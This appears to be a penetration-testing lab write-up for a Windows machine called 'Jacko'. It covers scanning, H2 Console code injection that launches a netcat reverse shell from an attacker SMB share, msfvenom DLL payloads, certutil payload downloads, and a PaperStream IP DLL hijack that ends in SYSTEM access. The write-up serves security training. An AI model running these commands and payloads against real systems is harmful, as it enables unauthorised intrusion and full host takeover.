# Jacko ## Nmap ``` sudo nmap 192.168.67.66 -p- -sS -sV PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 7680/tcp open pando-pub? 8082/tcp open http H2 database http console Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` On port 8082 we have a login page for H2 Console. Connecting with the default inputted values allows login to the console. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-25ddab3b8416cc11a12045eb4170cfd9532995e6%2Fimage.png?alt=media) Once logged in we can see that we are running on H2 Console version 1.4.199. A search on exploit-db shows that version 1.4.199 is vulnerable to code injection using Java. {% embed url="" %} The following snippet is the vulnerable code we need to run on the H2 Console: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3432701b0cfe46d84d7d0c37f2d46a7491d04b1e%2Fimage.png?alt=media) The section of the code that executed commands on the target machine has been shown below. To achieve code execution I set up a SMB Server on my attacking machine with Impacket's SMBserver.py script and ensured `nc.exe` was in the specified SMB share. `-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');` First set up a SMB server: ``` python2 smbserver.py -smb2support Share /home/kali/ ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-82577e7910f352fb229013f6fc828bf2c5cc5ba8%2Fimage.png?alt=media) Then paste the code from exploit-db into the SQL statement section of the website and ensure the --evaluate script section has the command for calling `nc.exe` on the attacking machines SMB server. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-891f262659841cd99089d68a77814af03fac5d67%2Fimage.png?alt=media) When ready run the SQL statement and we should see authentication on `smbserver.py` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-106211ec9c1106ddf8044d9f4a92a378fce89355%2Fimage.png?alt=media) And then shortly after catch a reverse shell on our `netcat` listener. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ce8afadb0bec320e28f418da7040166e75a57f2e%2Fimage.png?alt=media) First we need to fix PATH on the target machine as shown below: ``` set PATH=%SystemRoot%\system32;%SystemRoot%; ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-84c2f2daf54d378ce043ff76b8c1a2f6000de82f%2Fimage.png?alt=media) Looking through Program files (x86) we can see a directory called PAPERSTREAM IP. Looking for exploits on exploit-db takes us to the following: {% embed url="" %} The description for this exploit is shown below: ``` A DLL hijack vulnerability exists in the FJTWSVIC service running as part of the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches for a writable location, copies the specified DLL to that location and then triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32 named pipe. # Example payload generated as follows # msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444 $PayloadFile = "C:\Windows\Temp\UninOldIS.dll" ``` We need to change the DLL name generated by `msfvenom` and the payload location. When I attempted to download exploit to c:\windows\temp my file was deleted instantly. Possibly by AV? First I generated a `msfvenom` shell to the name of the DLL required which is UninOldIS.dll. `msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.67 LPORT=8082` Then changed the payload file variable to the users Desktop. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b3f12d09d7bc7597f8151917d5371e5cf954dc63%2Fimage.png?alt=media) At this point move into the users Desktop then use `certutil` to download the files as when copying by SMB I could get the payload to trigger without issues. ``` certutil -urlcache -split -f http://192.168.49.67/exploit.ps1 exploit.ps1 certutil -urlcache -split -f http://192.168.49.67/UninOldIS.dll UninOldIS.dll ``` Start a `netcat` listener on the attacking machine to listen in on port 8082. Then execute the Powershell exploit.ps1 on the target machine. `C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5b03f57522e5e0f8a6b066540f1ab41e36f36954%2Fimage.png?alt=media) A short while later we should receive a shell as SYSTEM. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6c3ca08b40a50612e4ae30802a41bf43cb8de95b%2Fimage.png?alt=media)